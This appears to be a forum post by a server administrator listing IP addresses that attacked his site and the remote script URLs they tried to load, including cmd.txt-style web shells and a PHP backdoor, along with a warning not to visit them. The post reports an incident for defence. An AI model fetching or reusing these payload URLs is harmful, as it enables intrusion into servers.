- Code: Select all
195.139.204.159
198.202.31.141
200.207.39.241
202.123.27.136
202.134.73.251
203.32.125.78
204.11.233.120
206.174.196.12
209.160.33.149
209.31.122.242
211.108.60.242
212.241.199.126
213.189.224.45
213.207.108.27
213.246.39.80
216.117.166.78
216.120.237.150
217.149.150.29
217.160.248.226
217.199.176.169
218.38.13.189
218.38.18.201
220.95.230.123
222.124.175.50
58.137.13.2
58.71.35.204
61.100.0.185
62.113.110.18
62.75.164.177
64.13.250.115
64.20.40.147
64.200.24.130
64.34.247.16
64.79.214.81
65.126.237.102
66.109.18.84
66.178.16.210
66.230.196.115
66.230.196.5
66.46.176.233
67.18.16.82
67.18.233.58
68.58.73.97
70.84.183.58
70.86.11.210
72.233.14.145
72.29.73.59
72.37.212.31
72.55.164.50
72.9.155.230
74.220.202.19
74.52.215.178
80.249.117.82
81.168.228.204
81.21.73.27
82.165.33.50
82.57.96.100
83.12.231.38
85.214.79.169
87.106.131.186
87.106.134.179
87.106.19.184
These IP Addresses themselves may not be the culprits, but they are then being exploited by those culprits. So I needed to resolve it and that was ONE of the things I have done.
These IP Addresses were trying to launch any one of the following files (many of which have been shut down)
- Code: Select all
http://71.102.93.10/WTS/bin/hak/id.txt
http://72.143.157.159/x.asc/r7
http://barcamp.org.uk/bn
http://br.geocities.com/jetynn/rootlab.jpg
http://darkness.ws/xpl/bot/safe.txt
http://glddemo.in/geeklog/logs/data.txt
http://h1.ripway.com/babi/cmd.txt
http://h1.ripway.com/babi/safe.txt
http://h1.ripway.com/logpar/echo.txt
http://h1.ripway.com/MrHappy/x.txt
http://jkjk.site.voila.fr/CMD.txt
http://manxdate.com/id_img/about.gif
http://ngrd.awardspace.com/cmd.txt
http://paginas.terra.com.br/lazer/cezinha/id.txt
http://pucorp.t5.com.br/cmd.txt
http://svurology.com/images/avatars/uploads/id.txt
http://trezze.ezua.com/scan_BoT/id.txt
http://usuarios.arnet.com.ar/alvarezluque/safe.txt
http://usuarios.arnet.com.ar/larry123/safe.txt
http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc
http://www.55thinking.com/doc/echo.txt
http://www.aniversaris.info/images/help.txt
http://www.beramar.xpg.com.br/id.txt
http://www.freewebtown.com/liviupustiu/safe.txt
http://www.freewebtown.com/liviupustiu/u.txt
http://www.h7host.xpgplus.com.br/id.txt
http://www.h7host.xpgplus.com.br/r6.txt
http://www.homedv.net/bht.txt
http://www.mfilter.us/mf/id.txt
http://www.mikeboller.com/cmd.txt
http://www.mohaa.team-empire.info/includes/read.txt
http://www.okgopchat.com/forum/id.txt
http://www.sufcdb.co.uk/comp/mic.txt
http://www.the-esao.com/imag/stringa.txt
http://www.tracanna.net//components/com_poll/images/id
http://www.tracanna.net//components/com_poll/images/id.txt
http://www.wisdom-creation.com/cmd.txt
http://www.youngpods.org/images/data.txt
Now before you go investigating those links... BE WARNED that at least one of them is actually a link to a virus. Which is a PHP Backdor. If you are running PHP on a Windows Machine, you will be susceptible to it.
Fortunately, it appears that they have not been able to gain access to the resources they wanted, but I am still going through logs. The down side is that they have a net effect of shutting down the MySQL Server (creating errors in the various applications.)
